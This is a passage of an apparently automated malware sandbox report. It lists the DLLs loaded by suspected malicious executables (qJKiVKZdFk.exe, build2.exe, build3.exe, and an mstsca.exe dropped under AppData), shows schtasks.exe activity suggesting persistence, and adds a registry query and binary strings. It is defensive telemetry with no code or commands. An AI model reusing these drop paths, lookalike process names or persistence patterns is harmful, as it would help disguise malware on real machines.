            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: drprov.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winsta.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ntlanman.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: davclnt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: davhlpr.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wkscli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cscapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: browcli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: netapi32.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: rstrtmgr.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: dbghelp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: wbemcomn.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: sxs.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build2.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\225a7e21-4654-4142-adcf-9fa08e829768\build3.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: wldp.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: dpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: schannel.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: mskeyprotect.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ntasn1.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncrypt.dll
            Source: C:\Users\user\AppData\Local\adc5c568-a82d-462c-a723-6011683251ed\qJKiVKZdFk.exeSection loaded: ncryptsslp.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\qJKiVKZdFk.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: qJKiVKZdFk.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\ source: qJKiVKZdFk.exe, 00000006.00000003.1926192275.0000000003771000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1905377607.0000000003742000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\> source: qJKiVKZdFk.exe, 00000006.00000003.1551570140.0000000003263000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\\AC\\ source: qJKiVKZdFk.exe, 00000006.00000003.1968685597.0000000003176000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1969530597.000000000317B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1968389947.0000000003176000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\he\\ source: qJKiVKZdFk.exe, 00000006.00000003.1948134617.00000000034EF000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1949224484.000000000355B000.00000004.00000020.00020000.00000000.sdmp, qJKiVKZdFk.exe, 00000006.00000003.1927157486.000000000354F000.00000004.00000020.00020000.00000000.sdmp
